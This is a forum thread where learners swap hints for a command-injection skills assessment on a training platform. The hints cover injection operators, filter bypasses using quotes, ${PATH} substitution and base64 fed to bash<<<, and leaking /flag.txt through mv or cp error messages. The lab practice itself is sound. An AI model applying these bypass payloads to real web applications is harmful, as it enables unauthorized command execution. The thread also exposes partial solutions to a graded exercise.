Academy | Command Injections - Skills Assessment

Feel free to DM me at anytime. I am East Coast US. so keep that in mind. It sounds like you are there, have you tried getting the flag to display in that error message? Or maybe copying? If you are using mv maybe it will not work.

If you are still having trouble, just DM me with a screenshot, or the line of code you are using on the target server.
-onthesauce

1 Like

Thanks a lot @onthesauce! Thought that I’ve already tried to do that yesterday. But with a fresh set of eyes today and your cp tips I’ve managed to get the flag.

Happy hacking!

Thanks for the instructions.

I did find the injection point and I am getting the “malicious” message.

I have tried various ways to obfuscate the requests.

For example the request below:

Gives this response:
Error while moving: mv: cannot stat ‘/var/www/html/files/2561732172.txt’: No such file or directory
mv: cannot move ‘/flag.txt’ to ‘/var/www/html/files/tmp/flag.txt’: Permission denied

The system (index.php file) understands the request but one cannot write to tmp directory.

Could you elaborate on the hint: “<<<”
Do you mean to obfuscate the file name only or a whole new command like “cat /flag.txt”?

Thanks a lot.

I think you might be trying to do the same thing as me which I don’t know if it is possible, but that is to move the flag.txt to the directory so I could then open and read it. Instead however, I found it much easier to try and get the file to dump it’s contents to an error message.

Was stuck at this for quite some time - for anyone struggling, here is (roughly) how the process of solving this one goes:

  1. Make a list of all operations you have access to - e.g search, copy, move
  2. Check which ones make network requests - this should only leave you with 2 requests to focus on .
  3. Check which parameters they have - from, to, finish etc.
  4. Don’t focus on any specific one of these parameters, I wasted quite some time on one, only to solve it with another.
  5. After you’ve decided which parameter to start testing with, you need the following - a way to start a subshell ( &&, || or ; ) and a goal (do you want to move the flag to a directory and read it, do you want to cat it’s contents? If catting - what output to - the page, or an error message?).
  6. After you’ve thought about this, craft different payloads to test. Will you obfuscate your command through base64? Or inserting quote marks between some characters? Try different things. Remember that some characters are blacklisted, so you will have to substitute them using PATH or something else, as other posters have said before.

It was quite the frustrating exercise - I was super close from the get-go, but the errors threw me off and I wasted a lot of time afterwards crafting other payloads & trying commix (an automated tool for OS command injection detection :smiley: ).

Hope this helps someone - if you’re still stuck DM me and I might be able to give you a better nudge.

I didn’t find a correct solution, but read the flag using the ‘-b’ switch for a server script that uses ‘mv’. Hack the planet haha :joy:

Ok.Got it. little hint, not directly solution: ‘((ob))’, yes, I know, but it’s not you think it is. Change something and fill in between the brackets and be sure to use money for it. :grinning:

With some tips I managed to get this question after some hard thinking!
If anyone needs a nudge in the right direction feel free to DM me

Solved.

  1. Click on all buttons (Copy, Move).
  2. Find the right place (Can be at the start of the file) to put injection operators ( | || %0a).
  3. Bypass filters for c"o"m"m"a"n"d and filtered characters .
  4. Find the good syntax to read the flag

Message me if you need hint :slight_smile:

This was a tough one. I found it helpful to do like they were saying and:

  • Manually explore every button in the web app (while logging everything in BurpSuite or OWASP ZAP)
  • Make note of any new HTTP Parameters as you’re going as the application acts differently depending on what parameters are supplied.
  • Keep an eye out for the Visual error that they were talking about “Malicious request” as this is a good sign that you might be hitting input validation
  • Ask yourself why something may need input validation? Developers aren’t going to put input validation in places where it isn’t needed.

Guys, does anybody know why “character shifting” technique for “&” doesn’t work here? It accepts %26, but $(tr%09’!-}‘%09’"-~'<<<%) results in an error.

Okay, I got the flag. Try to use base64 encoding guys and take a good look at “copying”

Hi Wathix,

Can you help with this please? I’ve been stuck on this assessment for a week now. I would greatly appreciate it.

Hi Swindler,

I’ve been trying all different ways the past week. Can you share how you were able to dump the contents of the flag in an error msg? I’m clicking on the Move folder, then injecting my command after the “to=” on the GET request. I’m getting different error messages, but it’s only showing exactly what I type in instead of the contents of the flag. Please help!

Do you still need help with this?

Yes please if you don’t mind helping. I’ve tried probably a hundred different things with this being the most recent:

Use the base64 encoded payload shown in the module to read the flag

echo  -n 'cat /flag.txt' | base64

You need to substitute / with something else (from previous modules ${PA…} in the above command. You can take that output and inject it using the below method:
‘bash<<<…’

In the URL after to= make sure you substitute characters for spaces and || or & as well. Once you insert the right payload use the move option to display the flag.

3 Likes

I managed to solve this skill assesement, but I don’t understand why

Like, I get the server is not blacklisting the “.”, but why the “” which basically returns a “.” don’t give the same result? I tested both commands on my terminal, and both command produces the same final result (&cat /flag.txt)

Can someone clarify to me why? Thanks!

1 Like

The ‘<’ characters may be blacklisted by the server, that’s probably why the second payload is not working

Nice challenge. Used cp instead of cat.

1 Like

thank you to everyone who contributed in providing tips you all were very helpful. my piece of advice would try and get an error in your burp requests that gives you an idea of what commands are being ran in what syntax while messing around with the different feilds of injection. once youve got the syntax then all you need to do is bypass filters and find the proper payload.